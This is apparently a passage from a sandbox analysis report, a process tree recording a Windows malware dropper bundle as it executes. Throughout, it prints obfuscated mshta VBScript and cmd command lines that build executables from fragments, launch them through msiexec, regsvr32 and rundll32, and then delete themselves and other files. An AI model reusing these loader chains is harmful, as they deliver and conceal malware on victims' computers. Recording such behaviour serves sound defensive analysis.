                                                                                                            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                            12⤵
                                                                                                              PID:6068
                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                            "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                            11⤵
                                                                                                              PID:6068
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                12⤵
                                                                                                                  PID:3824
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                    13⤵
                                                                                                                      PID:3956
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                      13⤵
                                                                                                                        PID:5660
                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                        msiexec -Y ..\lXQ2g.WC
                                                                                                                        13⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:3000
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                  10⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:5876
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3280
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 792
                                                                                                              8⤵
                                                                                                              • Program crash
                                                                                                              PID:6084
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 808
                                                                                                              8⤵
                                                                                                              • Program crash
                                                                                                              PID:3160
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 768
                                                                                                              8⤵
                                                                                                              • Program crash
                                                                                                              PID:5492
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 776
                                                                                                              8⤵
                                                                                                              • Program crash
                                                                                                              PID:5596
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 912
                                                                                                              8⤵
                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                              • Program crash
                                                                                                              PID:2440
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4508
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            PID:4588
                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Adds Run key to start application
                                                                                                              PID:1440
                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"
                                                                                                                9⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks computer location settings
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                PID:916
                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7ffa8d14dec0,0x7ffa8d14ded0,0x7ffa8d14dee0
                                                                                                                  10⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:2208
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff69af59e70,0x7ff69af59e80,0x7ff69af59e90
                                                                                                                    11⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:672
                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1836,2001460273083050827,6019279995147478166,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw916_1708075706" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1852 /prefetch:2
                                                                                                                  10⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:3776
                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,2001460273083050827,6019279995147478166,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw916_1708075706" --mojo-platform-channel-handle=1900 /prefetch:8
                                                                                                                  10⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:3804
                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1836,2001460273083050827,6019279995147478166,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw916_1708075706" --mojo-platform-channel-handle=1908 /prefetch:8
                                                                                                                  10⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:320
                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1836,2001460273083050827,6019279995147478166,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw916_1708075706" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2468 /prefetch:1
                                                                                                                  10⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks computer location settings
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5216
                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1836,2001460273083050827,6019279995147478166,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw916_1708075706" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2600 /prefetch:1
                                                                                                                  10⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks computer location settings
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:6116
                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1836,2001460273083050827,6019279995147478166,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw916_1708075706" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3220 /prefetch:2
                                                                                                                  10⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:3112
                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,2001460273083050827,6019279995147478166,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw916_1708075706" --mojo-platform-channel-handle=3500 /prefetch:8
                                                                                                                  10⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:716
                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,2001460273083050827,6019279995147478166,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw916_1708075706" --mojo-platform-channel-handle=3396 /prefetch:8
                                                                                                                  10⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5468
                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,2001460273083050827,6019279995147478166,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw916_1708075706" --mojo-platform-channel-handle=3472 /prefetch:8
                                                                                                                  10⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5252
                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,2001460273083050827,6019279995147478166,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw916_1708075706" --mojo-platform-channel-handle=3668 /prefetch:8
                                                                                                                  10⤵
                                                                                                                    PID:4240
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,2001460273083050827,6019279995147478166,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw916_1708075706" --mojo-platform-channel-handle=2888 /prefetch:8
                                                                                                                    10⤵
                                                                                                                      PID:3956
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Checks processor information in registry
                                                                                                                PID:4656
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW01.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                  8⤵
                                                                                                                    PID:5772
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /im Soft1WW01.exe /f
                                                                                                                      9⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:4408
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout /t 6
                                                                                                                      9⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:2228
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1484
                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 1484 -s 1508
                                                                                                                    8⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5820
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe
                                                                                                            4⤵
                                                                                                              PID:1784
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun03f5d51697d04.exe
                                                                                                                Sun03f5d51697d04.exe
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:2128
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-D3HA3.tmp\Sun03f5d51697d04.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-D3HA3.tmp\Sun03f5d51697d04.tmp" /SL5="$40054,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun03f5d51697d04.exe"
                                                                                                                  6⤵
                                                                                                                    PID:1436
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun03f5d51697d04.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun03f5d51697d04.exe" /SILENT
                                                                                                                      7⤵
                                                                                                                        PID:3912
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-BE1Q4.tmp\Sun03f5d51697d04.tmp
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-BE1Q4.tmp\Sun03f5d51697d04.tmp" /SL5="$30198,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun03f5d51697d04.exe" /SILENT
                                                                                                                          8⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          PID:3964
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-SRSMP.tmp\postback.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-SRSMP.tmp\postback.exe" ss1
                                                                                                                            9⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:2520
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe
                                                                                                                  4⤵
                                                                                                                    PID:1416
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun0328255c4bce6fb.exe
                                                                                                                      Sun0328255c4bce6fb.exe
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:1684
                                                                                                                      • C:\ProgramData\5779816.exe
                                                                                                                        "C:\ProgramData\5779816.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:756
                                                                                                                      • C:\ProgramData\5382736.exe
                                                                                                                        "C:\ProgramData\5382736.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:2248
                                                                                                                      • C:\ProgramData\3587513.exe
                                                                                                                        "C:\ProgramData\3587513.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:4152
                                                                                                                      • C:\ProgramData\5266579.exe
                                                                                                                        "C:\ProgramData\5266579.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:4396
                                                                                                                      • C:\ProgramData\5887898.exe
                                                                                                                        "C:\ProgramData\5887898.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4492
                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                          "C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT ( "WSCRiPT.SHelL" ). RuN ("C:\Windows\system32\cmd.exe /R copY /Y ""C:\ProgramData\5887898.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN ( ""C:\ProgramData\5887898.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0, trUe ) )
                                                                                                                          7⤵
                                                                                                                            PID:4772
                                                                                                                        • C:\ProgramData\7285343.exe
                                                                                                                          "C:\ProgramData\7285343.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4524
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun03f0dc4460bc9.exe
                                                                                                                Sun03f0dc4460bc9.exe
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:3296
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun03f0dc4460bc9.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun03f0dc4460bc9.exe
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3020
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\mk.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\mk.exe"
                                                                                                                    3⤵
                                                                                                                      PID:5312
                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 5312 -s 1244
                                                                                                                        4⤵
                                                                                                                        • Program crash
                                                                                                                        PID:204
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun033e271e0ce96c08.exe
                                                                                                                  Sun033e271e0ce96c08.exe /mixone
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:604
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 604 -s 660
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3196
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 604 -s 676
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4292
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 604 -s 672
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:4232
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 604 -s 684
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4748
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 604 -s 884
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5180
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 604 -s 932
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:1664
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 604 -s 1096
                                                                                                                    2⤵
                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                    • Program crash
                                                                                                                    PID:5588
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:1436
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  1⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:3912
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /R copY /Y "C:\ProgramData\5887898.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If "" =="" for %T IN ( "C:\ProgramData\5887898.exe" ) do taskkill -iM "%~nxT" -f
                                                                                                                  1⤵
                                                                                                                    PID:2252
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE
                                                                                                                      ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5100
                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                        "C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT ( "WSCRiPT.SHelL" ). RuN ("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If ""/PrWIGG7qbcjwuF1awT~BmZfq "" == """" for %T IN ( ""C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE"" ) do taskkill -iM ""%~nxT"" -f" , 0, trUe ) )
                                                                                                                        3⤵
                                                                                                                          PID:3520
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If "/PrWIGG7qbcjwuF1awT~BmZfq " =="" for %T IN ( "C:\Users\Admin\AppData\Local\Temp\ozR8x.ExE" ) do taskkill -iM "%~nxT" -f
                                                                                                                            4⤵
                                                                                                                              PID:1944
                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                            "C:\Windows\System32\mshta.exe" vbsCRIPt: cLoSE ( cReatEOBJECT ( "wscRIPt.shell" ). rUn ("CMd /c ecHO | SeT /P = ""MZ"" >STBAQR.mZ & CoPy /b /y StbAQR.mZ + NNIZo8.S + _7Ijs.BLD + GX3VA2JI.W + JGSZHKM.HL + XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u & del /Q *" , 0 ,tRUE ) )
                                                                                                                            3⤵
                                                                                                                              PID:6108
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c ecHO | SeT /P = "MZ" >STBAQR.mZ & CoPy /b /y StbAQR.mZ + NNIZo8.S + _7Ijs.BLD + GX3VA2JI.W + JGSZHKM.HL + XD16P.N ..\WaVZQ~GT.C & StArT regsvr32 /s ..\WAvZq~GT.C /u & del /Q *
                                                                                                                                4⤵
                                                                                                                                  PID:4408
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" ecHO "
                                                                                                                                    5⤵
                                                                                                                                      PID:5196
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>STBAQR.mZ"
                                                                                                                                      5⤵
                                                                                                                                        PID:3904
                                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                        regsvr32 /s ..\WAvZq~GT.C /u
                                                                                                                                        5⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:4392
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill -iM "5887898.exe" -f
                                                                                                                                  2⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:2128
                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                1⤵
                                                                                                                                  PID:5660
                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  1⤵
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  PID:5620
                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                  1⤵
                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                  PID:5212
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
